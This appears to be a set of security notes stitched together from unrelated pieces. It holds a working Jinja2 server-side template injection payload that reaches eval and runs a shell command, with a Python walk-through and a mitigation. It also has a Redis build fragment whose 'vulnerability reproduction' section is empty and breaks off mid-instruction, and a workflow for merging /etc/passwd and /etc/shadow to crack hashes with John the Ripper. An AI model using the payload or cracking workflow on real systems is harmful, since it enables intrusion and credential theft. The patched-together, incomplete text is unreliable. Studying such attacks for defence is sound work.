Server-Side Template Injection (SSTI): the server takes user input and embeds it as part of a web application template; when that template is compiled and rendered, malicious content inserted by the user can lead to disclosure of sensitive information, code execution, getting a shell, and similar outcomes. Never trust user input.
Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely embedding user input in templates enables Server-Side Template Injection, a frequently critical vulnerability that is extremely easy to mistake for Cross-Site Scripting (XSS), or miss entirely. Unlike XSS, Template Injection can be used to directly attack web servers' internals and often obtain Remote Code Execution (RCE), turning every vulnerable application into a potential pivot point. (Source: James Kettle, "Server-Side Template Injection: RCE for the Modern Web App", Black Hat USA 2015 whitepaper, us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.)
{# Jinja2 RCE payload: walk object's subclasses to reach warnings.catch_warnings, whose __init__ globals expose the builtins dict, then call eval() from it #}
{% for c in [].__class__.__base__.__subclasses__() %}
  {% if c.__name__ == 'catch_warnings' %}
    {% for b in c.__init__.__globals__.values() %}
      {% if b.__class__ == {}.__class__ %}
        {% if 'eval' in b.keys() %}
          {{ b['eval']('__import__("os").popen("ls").read()') }}
        {% endif %}
      {% endif %}
    {% endfor %}
  {% endif %}
{% endfor %}
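To make clear why the Jinja2 payload above works, here is the same object walk written as plain Python. This is an added example, not code from the original page; it imports `warnings` explicitly so that `catch_warnings` is guaranteed to be in `object`'s subclass list (in a real Flask/Jinja2 process it already is), and the function names are mine.

```python
import warnings  # noqa: F401  ensures warnings.catch_warnings is a loaded subclass of object


def find_builtins_via_catch_warnings():
    """Recover the builtins dict exactly as the payload does.

    [].__class__.__base__ is `object`; object.__subclasses__() lists every
    loaded direct subclass, including warnings.catch_warnings. That class's
    __init__ is an ordinary Python function, so __init__.__globals__ is the
    globals dict of the `warnings` module, and in every module except
    __main__ that dict carries __builtins__ as a plain dict containing eval.
    """
    for cls in [].__class__.__base__.__subclasses__():
        if cls.__name__ == 'catch_warnings':
            for value in cls.__init__.__globals__.values():
                # mirrors `b.__class__ == {}.__class__` and `'eval' in b.keys()`
                if value.__class__ is dict and 'eval' in value:
                    return value
    return None


def run_via_gadget(expression: str):
    """Evaluate `expression` through the recovered builtins, the step the
    payload performs with b['eval'](...). Any expression, including
    __import__("os").popen(...), would run here; a harmless one is used."""
    builtins_dict = find_builtins_via_catch_warnings()
    if builtins_dict is None:
        raise RuntimeError('catch_warnings gadget not available in this interpreter')
    return builtins_dict['eval'](expression)


if __name__ == '__main__':
    print(run_via_gadget('6*7'))  # 42: the chain reached the real eval()
```

The fix is not to filter strings like this payload but to keep user input out of the template source entirely: pass it as a render-context variable (`render_template_string(tpl, name=user)`, never `render_template_string('Hello ' + user)`), and render with `jinja2.sandbox.SandboxedEnvironment`, which refuses attribute lookups on names beginning with an underscore, so the `__class__` hop this chain starts from raises `SecurityError`.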
# Target machine: CentOS 7.0
# Install Redis on CentOS
wget http://download.redis.io/releases/redis-3.2.0.tar.gz
tar xzf redis-3.2.0.tar.gz
cd redis-3.2.0
make
0x03 Vulnerability reproduction
0x04 Troubleshooting
Building Redis-3.2.0 fails with:
make[1]: Entering directory `/home/fanson/redis-3.2.0/src'
    CC adlist.o
In file included from adlist.c:34:0:
zmalloc.h:50:31: fatal error: jemalloc/jemalloc.h: No such file or directory
The Redis README explains: selecting a non-default memory allocator when building Redis is done by setting the MALLOC environment variable. Redis is compiled and linked against libc malloc by default, with the exception of jemalloc being the default on Linux systems. This default was picked because jemalloc has proven to have fewer fragmentation problems than libc malloc. To force compiling against libc malloc (which avoids the missing jemalloc header above), use:
make MALLOC=libc
To compile against jemalloc on Mac OS X systems, use:
Cracking with a tool: John the Ripper ("JtR") is a very useful tool. It is a fast password cracker that runs on Windows and many Linux/Unix systems. It has many features and works remarkably well against many kinds of password hashes. The files JtR cracks must be in a specific format. To convert the passwd and shadow files into it, we use the /usr/sbin/unshadow executable, which merges the two files into one. This requires superuser privileges to run, because /etc/shadow is readable only by root.
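To show what `unshadow` actually produces, here is a pure-Python equivalent of the merge, added as an example (it is not part of the original page or of John the Ripper). It reads passwd(5) and shadow(5) text, replaces the `x` placeholder in each passwd entry with the hash from the matching shadow entry, and drops locked accounts that JtR could not crack anyway. The two inputs are constructed samples with placeholder hashes, not real system files.

```python
from typing import Dict, List

# Constructed sample input: the shapes of /etc/passwd and /etc/shadow, fake hashes.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
"""

SAMPLE_SHADOW = """\
root:$6$saltsalt$hashhashhash:19000:0:99999:7:::
alice:$6$othersalt$otherhash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
"""


def parse_shadow(text: str) -> Dict[str, str]:
    """Map user name -> password field (field 2) of each shadow(5) line."""
    hashes: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith('#'):
            continue
        fields = line.split(':')
        if len(fields) < 2:
            continue
        hashes[fields[0]] = fields[1]
    return hashes


def unshadow(passwd_text: str, shadow_text: str) -> List[str]:
    """Return passwd lines whose second field is replaced by the shadow hash,
    the single-file format `unshadow passwd shadow` prints for john."""
    hashes = parse_shadow(shadow_text)
    merged: List[str] = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(':')
        if len(fields) < 7:        # malformed passwd line, skip it
            continue
        if fields[0] in hashes:    # users without a shadow entry keep their field as-is
            fields[1] = hashes[fields[0]]
        merged.append(':'.join(fields))
    return merged


def crackable(lines: List[str]) -> List[str]:
    """Keep only entries with a real hash: '*' and '!' mark locked accounts,
    'x' means the shadow entry was missing, an empty field means no password."""
    kept: List[str] = []
    for line in lines:
        pw = line.split(':')[1]
        if pw and pw != 'x' and not pw.startswith(('*', '!')):
            kept.append(line)
    return kept


if __name__ == '__main__':
    for entry in crackable(unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)):
        print(entry)
```

The output lines are what you would feed to `john` (for example `john --wordlist=... merged.txt`); the `$6$` prefix tells john the hash is sha512crypt.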